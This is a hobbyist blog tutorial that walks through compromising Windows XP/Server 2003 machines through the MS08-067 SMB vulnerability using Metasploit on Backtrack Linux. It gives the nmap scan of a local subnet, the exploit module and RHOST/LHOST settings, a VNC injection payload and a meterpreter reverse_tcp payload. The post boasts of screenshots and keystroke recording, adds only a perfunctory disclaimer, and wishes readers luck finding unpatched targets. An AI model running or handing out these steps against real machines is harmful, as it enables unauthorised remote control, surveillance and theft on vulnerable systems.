Hello guys, in this article, I’ll show you how to hack vulnerable windows XP/Server 2003 PC with Metasploit on Backtrack.
Here I assume you are already familiar with Backtrack or you already have one installed on your PC or virtual machine. If you don’t have one yet, or are not familiar with Backtrack or Metasploit you can find out about it and download it here http://www.backtrack-linux.org/.
Anyway, Metasploit was originally written in Perl, but later it was re-written in ruby, it’s basically a large database of exploit code, scanners, encoders and payloads. To know more about Metasploit visit the official website here http://www.metasploit.com/ . There is also a version for those that love windows too, so you can use it on your windows PC. I hate windows!
Ok, here is my Metasploit terminal; I assume you know how to get there already because it’s not really a tutorial for beginners.
Anyway, if you don’t still know how to get there, here it is, remember I’m using Backtrack Linux, on windows is easier.
Here is the exploit we are going to use “ms08_067_netapi”. I recommend using Metasploit on Linux or at least a Linux virtual machine, the windows version isn’t that cool.
Once we have Metasploit fired up, we type this:
nmap -sS -Pn -A 192.168.0.103 or
nmap -sS -Pn -A 192.168.0.1/24 to scan more than one PC on the network.
The IP address above is the local address of the windows machine I’m scanning, this command is used for “port-scanning” your local area network to find live hosts , and report the number of open ports and the services (DAEMONS) running on them. Basically you should find SMB enabled on most of those PC’s.
After we find the machine, we run:
set RHOST 192.168.0.103 we set the IP address of the remote host (our windows PC)
set LHOST 192.168.0.107 we set the IP address of our current Linux PC
set THREADS 100 this is the thread value
use windows/smb/ms08_067_netapi This is the exploit we are using. SMB is used for file sharing on Windows and it has a vulnerability that we want to exploit.
Here is how it looks:
At this point, we use the
show payloads command to get a list of suitable payloads.
Here I’m going to use a Reflective VNC injection as my payload. Next type:
set PAYLOAD windows/vncinject/bind_tcp and we are all set to attack!
Next type in
exploit and let’s see what happens.
Remember, you can still use other payloads too e.g. I used
set PAYLOAD windows/meterpreter/reverse_tcp to have access to the PC’s command shell. You can reboot the computer, shutdown, get the system info and do other stuffs like taking the screenshot and recording keystrokes too.
Hehehe… I luv this, just hacked my Windows XP on my virtual PC!
If the exploit succeeds, you will get a VNC session, but if it doesn’t exist, it means the Windows PC has been patched, most likely windows XP SP1 or 2 should work, but I don’t think it will on SP3.
So get an old Windows XP PC and try the exploit on it as I did with my old windows XP SP1 on VMWare. With this tutorial, you should be able to exploit other vulnerabilities on windows 7, vista etc with Metasploit.
Remember, this is just a tutorial, do not use it on someone’s PC and I’m not responsible for anything that happens if you try. Anyway, I’m not too sure you will find so many people still using Windows XP SP1 but if you find, good luck to you.
This bug has been fixed a long time ago by Microsoft http://technet.microsoft.com/en-us/security/bulletin/ms08-067.
I write codes... web, mobile, desktop and hack stuffs